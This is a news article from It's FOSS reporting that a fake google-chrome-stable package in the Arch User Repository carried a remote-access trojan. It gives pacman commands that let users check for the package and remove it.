Ghostboard pixel
Latest news
Development Updates

Arch Linux Users at Risk Again as AUR Hit by Another RAT

A new pest appears in the Arch User Repository.

Sourav Rudra
a evil red-colored rat is seen standing near the arch linux logo
2 min read

The Arch User Repository (AUR) is a popular resource for Arch Linux users. It hosts user-submitted build scripts for software not included in the official repositories. While its openness provides flexibility, it also introduces vulnerabilities.

Merely a few weeks ago, AUR was hit by a RAT that disguised itself inside browser-related packages. It infected systems during the install process using a malicious GitHub link embedded in the PKGBUILD script.

Now, a similar case has emerged, where a new package pretending to be Google Chrome has been caught carrying another hidden RAT script.

What's Happening: A file named google-chrome-stable had made its way into the AUR, uploaded by a newly created user account called "forsenontop", who had no other activity other than this.

According to Linuxiac, the package used an .install script to run a Python command that downloaded and executed remote code each time the Chrome browser was launched. The code runs silently in the background, with no visible signs to the user.

Luckily, the package was quickly removed by AUR admins once it was reported by a user.

What Now: Like earlier, if you suspect that you might be affected, then you can first run the following command to see whether the malicious package is on your system:

pacman -Qs google-chrome-stable

If this package shows up in your system, then remove it immediately with:

sudo pacman -Rns google-chrome-stable

And I will say this again: always make sure your system is up to date and only install packages from trusted sources.

Via: Linuxiac

Suggested Read 📖

Someone Slipped a RAT into Arch Linux!
A sneaky menace made its way into Arch User Repository. Another reminder to not blindly trust packages from AUR, PPA and even from Snapcraft.
It's FOSS NewsSourav Rudra
🎗️
Here's why you should opt for It's FOSS Plus Membership:

- Even the biggest players in the Linux world don't care about desktop Linux users. We do.
- We don't put informational content behind paywall. Your support keeps it open for everyone. Think of it like 'pay it forward'.
- Don't like ads? With the Plus membership, you get an ad-free reading experience.
- When millions of AI-generated content is being published daily, you read and learn from real human Linux users.
- It costs just $2 a month, less than the cost of your favorite burger.

Become a Plus Member today and join over 300 people in supporting our work.
Published in: Development Updates
Author
Sourav Rudra

Sourav Rudra

A nerd with a passion for open source software, building custom gaming rigs/workstations, motorsports, and more.

View articles

Read next

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to It's FOSS News.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.